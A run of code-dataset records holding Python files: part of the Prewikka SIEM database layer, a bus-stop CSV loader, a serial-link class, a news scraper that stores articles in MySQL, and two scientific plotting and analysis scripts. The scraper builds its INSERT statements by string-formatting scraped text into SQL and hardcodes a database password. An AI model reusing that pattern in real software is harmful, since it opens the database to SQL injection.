kwargs:\n sql = sql % dict((key, self.escape(value)) for key, value in kwargs.items())\n\n return self._db.query(sql)\n\n def _chk(self, key, value, join=\"AND\"):\n if value is not None:\n return \" %s %s = %s\" % (join, key, self.escape(value))\n\n return \"\"\n\n def _chknull(self, key, value, join=\"AND\"):\n if value is None:\n return \" %s %s IS NULL\" % (join, key)\n else:\n return self._chk(key, value, join=join)\n\n @staticmethod\n def _mklist(value):\n if isinstance(value, (list, tuple)):\n return value\n else:\n return (value,)\n\n def get_type(self):\n return self._dbtype\n\n def escape(self, data):\n prefilter = self._get_prefilter(data)\n if prefilter:\n return prefilter(data)\n\n if not isinstance(data, compat.STRING_TYPES):\n return data if data is not None else \"NULL\"\n\n return self._db.escape(data)\n\n def escape_binary(self, data):\n return 
self._db.escapeBinary(data)\n\n def unescape_binary(self, data):\n return self._db.unescapeBinary(data)\n\n def get_last_insert_ident(self):\n return self._db.getLastInsertIdent()\n\n def _get_merge_value(self, merged, field, rownum):\n value = merged[field]\n if not isinstance(value, (tuple, list)):\n return value\n\n if rownum >= len(value):\n raise Exception(\"merge value should be unique, or list with the same number of rows\")\n\n return value[rownum]\n\n def _upsert_prepare_row(self, table, fields, row):\n return text_type(self.escape(row))\n\n def _upsert_prepare(self, table, pkey, fields, values_rows, returning=[], merge={}, func=None):\n up = []\n if func:\n up = [\"%s=%s\" % (f, func(f)) for f in fields]\n\n merged = {} if isinstance(merge, int) else merge\n\n vl = []\n delq = []\n\n for idx, row in enumerate(values_rows):\n vl.append(self._upsert_prepare_row(table, fields, row))\n\n if not merge:\n continue\n\n tmpl1 = []\n tmpl2 = []\n for field, value in zip(fields, row):\n if field in merged:\n tmpl1.append(\"%s = %s\" % (field, self.escape(self._get_merge_value(merged, field, idx))))\n\n elif field in pkey:\n tmpl2.append(\"%s = %s\" % (field, self.escape(value)))\n\n delq.append(\" AND \".join([\" AND \".join(tmpl1), \"NOT(\" + \" AND \".join(tmpl2) + \")\"]))\n\n if not vl:\n delq.append(\" AND \".join(\"%s = %s\" % (f, self.escape(v)) for f, v in merged.items()))\n\n return \", \".join(fields), \", \".join(vl), \", \".join(up), \", \".join(returning), \" AND \".join(delq)\n\n def _unlock_table(self, table):\n pass\n\n def transaction_start(self):\n # The actual transaction will be started on the first query\n self._transaction_state = self.__TRANSACTION_STATE_BEGIN\n\n def transaction_end(self):\n if self._transaction_state == self.__TRANSACTION_STATE_QUERY:\n self._db.transactionEnd()\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n def transaction_abort(self):\n if self._transaction_state == self.__TRANSACTION_STATE_QUERY:\n self._db.transactionAbort()\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n def __hash__(self):\n return self._dbhash\n\n\nclass MySQLDatabase(DatabaseCommon):\n def _lock_table(self, table):\n self.query(\"LOCK TABLES %s\" % \", \".join(t + \" WRITE\" for t in self._mklist(table)))\n\n def _unlock_table(self, table):\n self.query(\"UNLOCK TABLES;\")\n\n def _mysql_upsert(self, table, pkey, fields, values_rows, returning=[], merge={}):\n if returning:\n values_rows = list(values_rows)\n\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"VALUES(%s)\" % x)\n\n if vlfmt:\n self.query(\"INSERT INTO %s (%s) VALUES %s ON DUPLICATE KEY UPDATE %s\" % (table, fieldfmt, vlfmt, upfmt))\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n if retfmt:\n wh = []\n for row in values_rows:\n vl = \" AND \".join([\"%s = %s\" % (field, self.escape(row[i])) for i, field in enumerate(pkey)])\n wh.append(\"(%s)\" % vl)\n\n return self.query(\"SELECT %s FROM %s WHERE %s\" % (retfmt, table, \" OR \".join(wh)))\n\n @use_transaction\n def upsert(self, table, fields, values_rows, pkey=[], returning=[], merge={}):\n if not pkey:\n pkey = fields\n\n return self._mysql_upsert(table, pkey, fields, values_rows, returning, merge)\n\n\nclass PgSQLDatabase(DatabaseCommon):\n def _lock_table(self, table):\n self.query(\"LOCK TABLE %s IN EXCLUSIVE MODE\" % \", \".join(self._mklist(table)))\n\n @cache.memoize(\"table_info\")\n def _get_table_info(self, 
table):\n out = {}\n typemap = {\"bigint\": \"integer\", \"smallint\": \"integer\", \"character varying\": \"text\"}\n\n for field, _type, defval in self.query(\"SELECT column_name, data_type, column_default FROM information_schema.columns WHERE table_name = %s\", table.lower()):\n out[field] = utils.AttrObj(type=_type, generic_type=typemap.get(_type, _type), default=defval, auto_increment=\"nextval\" in (defval or \"\"))\n\n return out\n\n def _upsert_prepare_row(self, table, fields, row):\n out = []\n dtype = self._get_table_info(table)\n\n for f, v in zip(fields, row):\n cast = \"\"\n\n if self._version >= 90500 and dtype[f].auto_increment and v is None:\n v = \"DEFAULT\"\n else:\n if dtype[f].generic_type != \"text\":\n cast = \"::%s\" % dtype[f].type\n\n v = text_type(self.escape(v)) + cast\n\n out.append(v)\n\n return \"(\" + text_type(\", \".join(out)) + \")\"\n\n def _pgsql_upsert_cte_query(self, table, pkey, upfmt, fields, fieldfmt, vlfmt, retfmt):\n up_pkfmt = []\n in_pkfmt = []\n for v in pkey:\n up_pkfmt.append(\"%s.%s = nv.%s\" % (table, v, v))\n in_pkfmt.append(\"updated.%s = nv.%s\" % (v, v))\n\n dtype = self._get_table_info(table)\n insfmt = \", \".join(filter(lambda x: not(dtype[x].auto_increment), fields))\n\n update = \"UPDATE %s SET %s FROM nv WHERE %s RETURNING %s.*\" % (table, upfmt, \" AND \".join(up_pkfmt), table)\n insert = \"INSERT INTO %s (%s) SELECT %s FROM nv WHERE NOT EXISTS (SELECT 1 FROM updated WHERE %s)\" % (table, insfmt, insfmt, \" AND \".join(in_pkfmt))\n if retfmt:\n insert = \"%s RETURNING %s\" % (insert, retfmt)\n\n query = \"WITH nv (%s) AS (VALUES %s), updated AS (%s)\" % (fieldfmt, vlfmt, update)\n if retfmt:\n query = \"%s, inserted AS (%s) SELECT %s FROM inserted UNION ALL SELECT %s FROM updated\" % (query, insert, retfmt, retfmt)\n else:\n query = \" \".join((query, insert))\n\n return self.query(query)\n\n def _pgsql_upsert_cte(self, table, pkey, fields, values_rows, returning=[], merge={}):\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"nv.%s\" % x)\n\n self._lock_table(table)\n try:\n if vlfmt:\n ret = self._pgsql_upsert_cte_query(table, pkey, upfmt, fields, fieldfmt, vlfmt, retfmt)\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n finally:\n self._unlock_table(table)\n\n if vlfmt and retfmt:\n return ret\n\n def _pgsql_upsert(self, table, pkey, fields, values_rows, returning=[], merge={}):\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"EXCLUDED.%s\" % (x))\n if vlfmt:\n if retfmt:\n retfmt = \" RETURNING %s\" % retfmt\n\n ret = self.query(\"INSERT INTO %s (%s) VALUES %s ON CONFLICT (%s) DO UPDATE SET %s%s\" % (table, fieldfmt, vlfmt, \",\".join(pkey), upfmt, retfmt))\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n if vlfmt and retfmt:\n return ret\n\n def _pgsql_upsert_emulate_single(self, table, pkey, fields, row, fieldfmt, retfmt):\n up_fmt = []\n wh_fmt = []\n vl_fmt = []\n\n for i, v in enumerate(fields):\n if v in pkey:\n wh_fmt.append(\"%s = %s\" % (v, self.escape(row[i])))\n\n up_fmt.append(\"%s = %s\" % (v, self.escape(row[i])))\n vl_fmt.append(text_type(self.escape(row[i])))\n\n ret = self.query(\"UPDATE %s SET %s WHERE %s%s\" % (table, \", \".join(up_fmt), \" AND \".join(wh_fmt), retfmt))\n if ret:\n return ret\n\n return self.query(\"INSERT INTO %s (%s) SELECT %s WHERE NOT EXISTS (SELECT 1 FROM %s WHERE %s)%s\" 
%\n (table, fieldfmt, \", \".join(vl_fmt), table, \" AND \".join(wh_fmt), retfmt))\n\n def _pgsql_upsert_emulate(self, table, pkey, fields, values_rows, returning=[], merge={}):\n values_rows = list(values_rows)\n\n fieldfmt, _, _, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge)\n if retfmt:\n retfmt = \" RETURNING %s\" % retfmt\n\n returning = []\n self._lock_table(table)\n\n try:\n for row in values_rows:\n ret = self._pgsql_upsert_emulate_single(table, pkey, fields, row, fieldfmt, retfmt)\n if ret and retfmt:\n returning.append(ret[0])\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n finally:\n self._unlock_table(table)\n\n return returning\n\n @use_transaction\n def upsert(self, table, fields, values_rows, pkey=[], returning=[], merge={}):\n if not pkey:\n pkey = fields\n\n if self._version >= 90500:\n ret = self._pgsql_upsert(table, pkey, fields, values_rows, returning, merge)\n\n elif self._version >= 90100:\n ret = self._pgsql_upsert_cte(table, pkey, fields, values_rows, returning, merge)\n\n else:\n ret = self._pgsql_upsert_emulate(table, pkey, fields, values_rows, returning, merge)\n\n return ret\n\n\nclass NoDatabase(DatabaseCommon):\n def query(self, *args, **kwargs):\n raise error.PrewikkaUserError(N_(\"Database configuration error\"), N_(\"Only MySQL and PostgreSQL databases are supported at the moment\"))\n\n\nclass Database(object):\n def __new__(cls, settings):\n type = settings.get(\"type\")\n if type == \"pgsql\":\n return PgSQLDatabase(settings)\n\n elif type == \"mysql\":\n return MySQLDatabase(settings)\n\n else:\n return NoDatabase(settings)\n\n\nclass PrewikkaDatabase(object):\n def __new__(cls, config):\n settings = {\"host\": \"localhost\", \"name\": \"prewikka\", \"user\": \"prewikka\", \"type\": \"mysql\"}\n settings.update(config.items())\n\n type = settings[\"type\"]\n if type == \"pgsql\":\n return PrewikkaPgSQLDatabase(settings)\n\n elif type == \"mysql\":\n return PrewikkaMySQLDatabase(settings)\n\n else:\n return PrewikkaNoDatabase(settings)\n\n\nclass PrewikkaDatabaseCommon(DatabaseCommon):\n def __init__(self):\n env.db = self\n dh = DatabaseUpdateHelper(\"prewikka\", self.required_version, self.required_branch)\n dh.apply()\n\n self._last_plugin_activation_change = self._get_last_plugin_changed()\n\n @cache.memoize_property(\"modinfos_cache\")\n def modinfos(self):\n try:\n rows = self.query(\"SELECT module, branch, version, enabled FROM Prewikka_Module_Registry\")\n except:\n return {}\n\n return dict((i[0], ModuleInfo(i[1], i[2], int(i[3]))) for i in rows)\n\n def is_plugin_active(self, plugin):\n module = self.modinfos.get(plugin.full_module_name)\n if module:\n return module.enabled == 1\n\n return plugin.plugin_enabled\n\n def _get_last_plugin_changed(self):\n rows = self.query(\"SELECT time FROM Prewikka_Module_Changed\")[0][0]\n return utils.timeutil.get_timestamp_from_string(rows)\n\n def has_plugin_changed(self):\n last = self._get_last_plugin_changed()\n\n if last <= self._last_plugin_activation_change:\n return False\n\n self._last_plugin_activation_change = last\n self.modinfos_cache.clear()\n\n return True\n\n def trigger_plugin_change(self):\n self.query(\"UPDATE Prewikka_Module_Changed SET time=current_timestamp\")\n\n\nclass PrewikkaPgSQLDatabase(PgSQLDatabase, PrewikkaDatabaseCommon):\n def __init__(self, settings):\n PgSQLDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n\n\nclass PrewikkaMySQLDatabase(MySQLDatabase, 
PrewikkaDatabaseCommon):\n def __init__(self, settings):\n MySQLDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n\n\nclass PrewikkaNoDatabase(NoDatabase, PrewikkaDatabaseCommon):\n def __init__(self, settings):\n NoDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"prewikka/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":31042,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"1383977322","text":"import csv\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\nstop = {}\n\nstop_id = []\nstop_name = []\nstop_lat = []\nstop_lon = []\nzone_id = []\nlocation_type = []\nstop_timezone = []\n\nwith open(str(dir_path + \"/bus_en/stops.csv\"),'rt',encoding = 'utf8') as f:\n stop_dict = csv.DictReader(f ,delimiter=',')\n for row in stop_dict:\n stop_id.append(row['stop_id'])\n stop_name.append(row['stop_name'])\n stop_lat.append(row['stop_lat'])\n stop_lon.append(row['stop_lon'])\n location_type.append(row['location_type'])\n stop_timezone.append(row['stop_timezone'])\n\nfor i in range(len(stop_id)):\n stop[str(stop_id[i])] = [stop_id[i],stop_name[i],stop_lat[i],stop_lon[i],location_type[i],stop_timezone[i]]\n\n'''\nprint(stop)\n'''","repo_name":"dafaqSTEVEN/Kivy","sub_path":"stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73863267111","text":"import time\n\nfrom lib.enlace.RX import RX\nfrom lib.enlace.TX import TX\nfrom lib.interface.Interface import Interface\n\n\nclass Enlace:\n def __init__ (self, interface:Interface):\n self.interface = interface\n self.rx = RX(self.interface)\n self.tx = TX(self.interface)\n\n\n def enable (self):\n self.interface.open()\n time.sleep(0.1)\n self.rx.enable()\n self.tx.enable()\n\n\n def disable (self):\n self.rx.disable()\n self.tx.disable()\n time.sleep(0.1)\n self.interface.close()\n\n\n def clear (self):\n self.rx.clear()\n self.tx.clear()\n\n\n def transmit (self, data:bytes) -> None:\n self.tx.transmit(data)\n\n\n def receive (self, size:int=-1, timeout:int=-1) -> bytes:\n try:\n return self.rx.receive(size, timeout)\n except RX.TimeoutException as error:\n raise Enlace.TimeoutException(error.time)\n\n\n class TimeoutException (RX.TimeoutException):\n \"\"\"Couldn't receive the amount requested bytes within the timeout.\n \"\"\"\n pass\n","repo_name":"FelixLuciano/P2P-UART-Serialization","sub_path":"src/lib/enlace/Enlace.py","file_name":"Enlace.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4964733070","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport pymysql\n\nfrom test1 import GetNewsDetail\ndef parseListLinks(url):\n newsdetails=[]\n res=requests.get(url)\n jd=json.loads(res.text)\n for ent in jd['result']['data']:\n newsdetails.append(GetNewsDetail(ent['url']))\n return 
newsdetails\n#print(parseListLinks('http://api.roll.news.sina.com.cn/zt_list?channel=news&cat_1=gnxw&cat_2==gdxw1||=gatxw||=zs-pl||=mtjj&level==1||=2&show_ext=1&show_all=1&show_num=22&tag=1&format=json&page=1'))\nurl='http://api.roll.news.sina.com.cn/zt_list?channel=news&cat_1=gnxw&cat_2==gdxw1||=gatxw||=zs-pl||=mtjj&level==1||=2&show_ext=1&show_all=1&show_num=22&tag=1&format=json&page={}'\nnews_total=[]\nfor i in range(1,30):\n newsurl=url.format(i)\n newsary=parseListLinks(newsurl)\n news_total.extend(newsary)\n\n\n# Connect to the database\nconnect = pymysql.Connect(\n host='localhost',\n port=3306,\n user='root',\n password='0511',\n database='test',\n charset='utf8'\n)\n\nfor i in range(len(news_total)):\n cursor = connect.cursor()\n sql = \"INSERT INTO test ( article, comments,dt,editor,source,title) VALUES ( '%s', %d,'%s','%s','%s','%s' )\"\n data = ( news_total[i]['article'], news_total[i]['comments'],news_total[i]['dt'],news_total[i]['editor'], news_total[i]['source'],news_total[i]['title'])\n cursor.execute(sql % data)\n connect.commit()\nprint('Successfully inserted', cursor.rowcount, 'rows')\n# Close the connection\ncursor.close()\nconnect.close()","repo_name":"mycly/sina","sub_path":"test/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"179379176","text":"# -*- coding: utf-8 -*-\n# @Author: lshuns\n# @Date: 2023-04-02 17:20:20\n# @Last Modified by: lshuns\n# @Last Modified time: 2023-05-09 17:27:15\n\n### the relative uncertainties in galaxy morphology\n\n\nimport os\n\nimport pandas as pd \nimport numpy as np \n\nimport matplotlib as mpl\nmpl.rcParams['xtick.direction'] = 'in'\nmpl.rcParams['ytick.direction'] = 'in'\nmpl.rcParams['xtick.top'] = True\nmpl.rcParams['ytick.right'] = True\n\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.ticker import AutoMinorLocator, LogLocator, NullFormatter, NullLocator\n\n########## general info\n\n# plot properties\n# outpath = 'show'\noutpath = './plots/morphology_error.pdf'\nFIGSIZE = [12, 12]\nfont_size = 16\nusetex = True\nMS = 4\n# font size\nplt.rc('font', size=font_size)\n# tex\nplt.rcParams[\"text.usetex\"] = usetex\nplt.rcParams['font.family'] = 'serif'\n\nif outpath != 'show':\n backend_orig = plt.get_backend()\n plt.switch_backend(\"agg\")\n# how many sub-plots\nfig, axs = plt.subplots(3, 3, sharex=False, sharey=False, figsize=FIGSIZE)\n\n# morphology columns\nskills_cols = ['Re_arcsec', 'BA', 'shape/sersic_n']\ncosmos_cols = ['RE_GALFIT_HI', 'BA_GALFIT_HI', 'N_GALFIT_HI']\nerr_cols = ['REERR_GALFIT_HI', 'BAERR_GALFIT_HI', 'NERR_GALFIT_HI']\ndm_label_names = ['size', 'q', 'n']\n\n# binning info for morphology columns\nnbins = 40\nloc_legend = None\nXLABEL_h_list = ['half-light radius (arcsec)', 'axis ratio', r'S\'ersic index']\nXRANGE_h_list = [[0.05, 2], [0.05, 0.9], [0.6, 5.9]]\nxlog_list = [True, False, False]\n\n# magnitude columns\ncosmos_mag = 'r_mag_auto'\nskills_mag = 'r_SDSS_apparent_corr'\n\n########## COSMOS data catalogue\ninpath = '/disks/shear10/ssli/ImSim/input/COSMOS_cata/cosmos_shape_z_uBVriZYJHKs.feather'\ncosmos_cata = pd.read_feather(inpath)\nprint('COSMOS ori', len(cosmos_cata))\n### select\n###### 0. discard too small or too big galaxies\nmask_re = (cosmos_cata['RE_GALFIT_HI']>=1e-2) & (cosmos_cata['RE_GALFIT_HI']<=10.)\n###### 1. good shape\nmask_galfit = (cosmos_cata['FLAG_GALFIT_HI']==0)\n###### 2. 
has magnitude\nmask_mag = (cosmos_cata['r_mag_auto']>0)\n### apply\ncosmos_cata = cosmos_cata[mask_galfit & mask_re & mask_mag]\ndel mask_galfit, mask_re\ncosmos_cata.reset_index(drop=True, inplace=True)\nprint('COSMOS selected', len(cosmos_cata))\n### selected used columns\ncosmos_cata = cosmos_cata[cosmos_cols+err_cols+[cosmos_mag]]\n\n########## SKiLLS mock catalogue\ninpath = '/disks/shear10/ssli/ImSim/input/SURFS_cata/skills_v07Ds_input_part0_shifted.feather'\nskills_cata = pd.read_feather(inpath)\n\n########## dm files\nindir_tmp = '/net/grecht/data2/ssli_files/Projects/Projects/8ShearBias_ImSim/MultiBand_ImSim/sensitivity_test/galaxy/results'\ninpath_dm_list = [[os.path.join(indir_tmp, f'dm_ZBbins_skills_v07D7_{label}U_nogold_reweighted.csv'), \n os.path.join(indir_tmp, f'dm_ZBbins_skills_v07D7_{label}D_nogold_reweighted.csv')]\n for label in dm_label_names]\nCOLORs_dm = ['darkred', 'darkblue']\nLABELs_dm = ['shift up', 'shift down']\n\n########## 1. the relation between the mag and relative error\ni_row = 0\nXLABEL = r'$r$-band magnitude'\nYLABEL = 'Relative uncertainties'\n\nXRANGE = [22.2, 25.4]\nYRANGE = [0.01, 0.13]\n\nfor i_col, cosmos_col in enumerate(cosmos_cols):\n\n err_col = err_cols[i_col]\n\n ax = axs[i_row, i_col]\n\n ## data\n test_df = pd.DataFrame({'xval': cosmos_cata[cosmos_mag].values,\n 'yval': cosmos_cata[err_col].values/cosmos_cata[cosmos_col].values})\n # group \n Ngroup = 10\n test_df.loc[:, 'bin'] = pd.qcut(test_df['xval'].values, Ngroup, labels=False)\n # get the median\n test_df_median = test_df.groupby('bin').median()\n ax.errorbar(test_df_median['xval'].values, test_df_median['yval'].values, \n color='k', linestyle='--', marker='o', markersize=MS)\n\n # the labels\n ax.set_xlabel(XLABEL)\n if i_col == 0:\n ax.set_ylabel(YLABEL)\n\n # some general setting\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n ax.set_xlim(XRANGE[0], XRANGE[1])\n ax.set_ylim(YRANGE[0], YRANGE[1])\n\n########## 2. 
the distribution \ni_row = 1\n\nYLABEL = 'Probability density'\n\n# 0, 1, 2\nCOLORs = ['k', 'darkred', 'darkblue']\nLINEs = ['solid', 'solid', 'solid']\nLWs = [1, 1, 1]\nLABELs = ['fiducial', 'shift up', 'shift down']\n\nfor i_col, skills_col in enumerate(skills_cols):\n\n ax = axs[i_row, i_col]\n\n xlog = xlog_list[i_col]\n XRANGE = XRANGE_h_list[i_col]\n XLABEL = XLABEL_h_list[i_col]\n\n # the fiducial\n para = skills_cata[skills_col].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[0], \n label=LABELs[0], \n alpha=0.3, \n linestyle=LINEs[0],\n linewidth=LWs[0])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[0], \n label=LABELs[0], \n alpha=0.3, \n linestyle=LINEs[0],\n linewidth=LWs[0])\n\n # the up\n para = skills_cata[f'{skills_col}_U'].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[1], \n label=LABELs[1], \n histtype='step', \n linestyle=LINEs[1],\n linewidth=LWs[1])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[1], \n label=LABELs[1], \n histtype='step', \n linestyle=LINEs[1],\n linewidth=LWs[1])\n\n # the down\n para = skills_cata[f'{skills_col}_D'].values\n if xlog:\n logbins = np.logspace(np.log10(XRANGE[0]), np.log10(XRANGE[1]), nbins)\n ax.hist(x=para, \n bins=logbins, \n range=XRANGE,\n density=True, \n color=COLORs[2], \n label=LABELs[2], \n histtype='step', \n linestyle=LINEs[2],\n linewidth=LWs[2])\n else:\n ax.hist(x=para, \n bins=nbins, \n range=XRANGE,\n density=True, \n color=COLORs[2], \n label=LABELs[2], \n histtype='step', \n linestyle=LINEs[2],\n linewidth=LWs[2])\n\n if xlog:\n ax.set_xscale('log')\n\n # the labels\n ax.set_xlabel(XLABEL)\n if i_col == 0:\n ax.set_ylabel(YLABEL)\n\n ax.set_xlim(XRANGE[0], XRANGE[1])\n\n if i_col==2:\n ax.legend(frameon=True, loc=loc_legend)\n\n########## 3. the dm\ni_row = 2\n\nXRANGE = [-0.009, 0.009]\nXLABEL = r\"$\\Delta m$\"\nYTICK = [1, 2, 3, 4, 5]\nbinvalue = np.array(YTICK)\nYTICKLABELS = [r'$0.1< z_{\\rm B} \\leq 0.3$', \n r'$0.3< z_{\\rm B} \\leq 0.5$', \n r'$0.5< z_{\\rm B} \\leq 0.7$', \n r'$0.7< z_{\\rm B} \\leq 0.9$', \n r'$0.9< z_{\\rm B} \\leq 1.2$']\nYLIM = [0.5, 5.5]\n\nfor i_col, inpath_list_tmp in enumerate(inpath_dm_list):\n\n ax = axs[i_row, i_col]\n\n # get values and plot\n Npoints = len(inpath_list_tmp)\n for i_val, inpath in enumerate(inpath_list_tmp):\n try:\n data = pd.read_csv(inpath)\n except FileNotFoundError:\n continue\n\n # the first row is for whole\n mvalue = (data.loc[1:, 'm1'].values + data.loc[1:, 'm2'].values) / 2.\n print('dm value', mvalue)\n # error\n merror = (data.loc[1:, 'm1_err'].values + data.loc[1:, 'm2_err'].values) / 2.\n print('dm error', merror)\n del data\n\n ax.errorbar(mvalue, binvalue + (i_val-Npoints/2.) 
* 0.1, xerr=merror,\n color=COLORs_dm[i_val], marker='o', markersize=4, elinewidth=1.5, \n ls='none', label=LABELs_dm[i_val])\n\n for ibin in range(5):\n ax.axhline(y=1.5+ibin, color='black', ls='-', lw=1)\n\n ax.axvline(x=0.0, ls='dotted', label=None, color='k', linewidth=1.5)\n\n if i_col == 0:\n ax.set_yticks(ticks=YTICK, labels=YTICKLABELS)\n else:\n ax.set_yticks([])\n\n ax.tick_params(axis='y', length=0, width=0)\n\n ax.set_xlim(XRANGE[0], XRANGE[1])\n ax.set_ylim(YLIM[0], YLIM[1])\n ax.set_xlabel(XLABEL)\n\n # invert y-axis\n ax.invert_yaxis()\n\nif outpath == 'show':\n plt.show()\n plt.close()\nelse:\n plt.savefig(outpath, dpi=300)\n plt.close()\n plt.switch_backend(backend_orig)\n print(\"plot saved as\", outpath) \n","repo_name":"lshuns/CSK1000LF321","sub_path":"paper_plot/Figg_C1_morphology_error.py","file_name":"Figg_C1_morphology_error.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"8223673543","text":"\nimport sys\nsys.path.insert(1, '/home/testaovo/Scrivania/LABORATORIO/TOF/Lab_TOF')\n\nimport argparse \nimport numpy\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom matplotlib.colors import LogNorm\n\nimport fit_functions\nimport plot_functions\nimport geometry\nimport analysis_functions\nimport utilities\n\n\nif __name__ == '__main__' : \n\n m, dm , costant, tau_diff = utilities.read_parameter('vs_x/T13_T23_vs_x.txt', 'vs_x/Tsum_Tdiff_vs_x.txt') \n bias_tof = 2.342\n \n input_file = 'dati/Run47.dat' \n t, ch0, ch1 = numpy.loadtxt(input_file, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n t_run = utilities.acquisition_duration(t)\n T13, T23 = utilities.TAC_scale(ch0, ch1) \n mask = (T23 > 1.) * (T13 > 1.) * (T23 < 65.) * (T13 < 65.)\n T13 = T13[mask]\n T23 = T23[mask]\n info_run = '%d events, %d seconds' % (len(T13), t_run) \n
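\n # Note (illustrative): multiplying boolean arrays acts as a logical AND here, so the\n # mask above is equivalent to (T23 > 1.) & (T13 > 1.) & (T23 < 65.) & (T13 < 65.)\n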
\n \n input_data_file_pb = 'dati/Run57.dat'\n t, ch0, ch1 = numpy.loadtxt(input_data_file_pb, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n T13_pb, T23_pb = utilities.TAC_scale(ch0, ch1) \n t_run_pb = utilities.acquisition_duration(t)\n mask = (T23_pb > 1.) * (T13_pb > 1.) * (T23_pb < 65.) * (T13_pb < 65.)\n T13_pb = T13_pb[mask]\n T23_pb = T23_pb[mask]\n figlabel = '_run_pb' \n info_run_pb = '%d events, %d seconds' % (len(T13_pb), t_run_pb) \n\n\n input_data_file_pb2 = 'dati/Run67.dat'\n t, ch0, ch1 = numpy.loadtxt(input_data_file_pb2, unpack = True)\n utilities.rate_and_saturation(t, ch0, ch1)\n T13_pb2, T23_pb2 = utilities.TAC_scale(ch0, ch1) \n t_run_pb2 = utilities.acquisition_duration(t)\n mask = (T23_pb2 > 1.) * (T13_pb2 > 1.) * (T23_pb2 < 65.) * (T13_pb2 < 65.)\n T13_pb2 = T13_pb2[mask]\n T23_pb2 = T23_pb2[mask]\n info_run_pb2 = '%d events, %d seconds' % (len(T13_pb2), t_run_pb2) \n\n print(\"info run47: %s\" % info_run)\n print(\"info run57: %s\" % info_run_pb) \n print(\"info run67: %s\" % info_run_pb2) \n\n TOF = analysis_functions.TOF(T13, T23, costant) \n TOF = TOF + bias_tof\n T12 = analysis_functions.T12(T13, T23, tau_diff)\n x = analysis_functions.x(T12, m) \n l = analysis_functions.l(x, geometry.h_13_long * 100, geometry.s3 * 100) \n beta = analysis_functions.beta(l, geometry.h_13_long * 100, TOF) \n #plot_functions.hist2d(TOF, l, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm())\n\n TOF_pb = analysis_functions.TOF(T13_pb, T23_pb, costant) \n TOF_pb = TOF_pb + bias_tof\n T12_pb = analysis_functions.T12(T13_pb, T23_pb, tau_diff)\n x_pb = analysis_functions.x(T12_pb, m ) \n l_pb = analysis_functions.l(x_pb, geometry.h_13_long * 100, geometry.s3 * 100) \n beta_pb = analysis_functions.beta(l_pb, geometry.h_13_long * 100, TOF_pb ) \n #plot_functions.hist2d(TOF_pb, l_pb, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm())\n\n \n TOF_pb2 = analysis_functions.TOF(T13_pb2, T23_pb2, costant) \n TOF_pb2 = TOF_pb2 + bias_tof\n T12_pb2 = analysis_functions.T12(T13_pb2, T23_pb2, tau_diff)\n x_pb2 = analysis_functions.x(T12_pb2, m ) \n l_pb2 = analysis_functions.l(x_pb2, geometry.h_13_long * 100, geometry.s3 * 100) \n beta_pb2 = analysis_functions.beta(l_pb2, geometry.h_13_long * 100, TOF_pb2 ) \n #plot_functions.hist2d(TOF_pb2, l_pb2, \"TOF [ns]\", \"l[cm]\", bins=None, range_x = (-10., 20.), range_y = (170., 270.), norm = LogNorm()) \n \n \n\n\n plot_functions.three_histogram_data(beta, beta_pb, beta_pb2, \"beta\", \"a.u.\", bins = None, range = (0., 2.), density = False, title = '', labelx = 'no lead', labely = '7 layers', labelz='4 layers')\n\n plt.ion()\n 